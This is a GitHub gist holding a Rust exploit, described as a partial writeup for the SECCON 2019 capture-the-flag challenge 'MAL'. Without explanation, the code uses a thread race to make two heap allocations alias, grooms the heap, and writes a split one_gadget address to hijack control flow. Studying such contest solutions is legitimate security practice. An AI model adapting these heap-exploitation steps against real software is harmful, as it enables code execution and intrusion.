Skip to content

Instantly share code, notes, and snippets.

@megumish

megumish/example_exploit.rs

Created October 20, 2019 08:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save megumish/66e9020274b844823b62fb10b98e7e26 to your computer and use it in GitHub Desktop.
Save megumish/66e9020274b844823b62fb10b98e7e26 to your computer and use it in GitHub Desktop.
Download ZIP
SECCON 2019 Online MAL partial writeup
Raw
example_exploit.rs
extern crate mal;
fn nyan() -> Box<[u64; 20]>{
std::thread::sleep_ms(1);
Box::new([0x0u64; 20])
}
fn nyan2(_: Box<[u64; 16]>){
std::thread::sleep_ms(1);
}
fn nyan3() -> Box<[u64; 16]>{
std::thread::sleep_ms(1);
Box::new([0x0u64; 16])
}
fn f() -> &'static str{
let mut a = Vec::<u8>::new();
a.push(0);
let addr: *const u8 = &a[0];
let addr = addr as u64 + 0x200000 - 0x10;
let mut vec1 = loop {
let child = std::thread::spawn(move || nyan());
std::thread::sleep_ms(1);
let mut vec1 = Box::new([0x0u64; 20]);
let mut vec_extra = Box::new([0x0u64; 20]);
let mut vec2 = child.join().unwrap();
let addr_vec1: *const u64 = &vec1[0];
let addr_vec2: *const u64 = &vec2[0];
if addr_vec1 as u64 == addr_vec2 as u64 {
break vec1
}
};
let vec2 = Box::new([0x0u64; 4]);
let vec2 = Box::new([0x0u64; 6]);
let vec2 = Box::new([0x0u64; 4]);
let vec2 = Box::new([0x0u64; 10]);
let vec2 = Box::new([0x0u64; 2]);
let vec2 = Box::new([0x0u64; 2]);
let vec2 = Box::new([0x0u64; 1]);
{
let vec2 = Box::new([0x0u64; 1]);
vec1[0] = addr + 0x3ed883;
}
let vec2 = Box::new([0x0u64; 20]);
let vec2 = Box::new([0x0u64; 20]);
let mut vec2 = Box::new([0x0u64; 28]);
let one_gadget1 = ((addr + 0x10a38c) & 0xffffff000000) >> (8 * 3);
let one_gadget2 = ((addr + 0x10a38c) & 0xffffff) << (8 * 5);
vec2[11] = one_gadget1;
vec2[10] = one_gadget2;
"A"
}
fn main() {
f();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment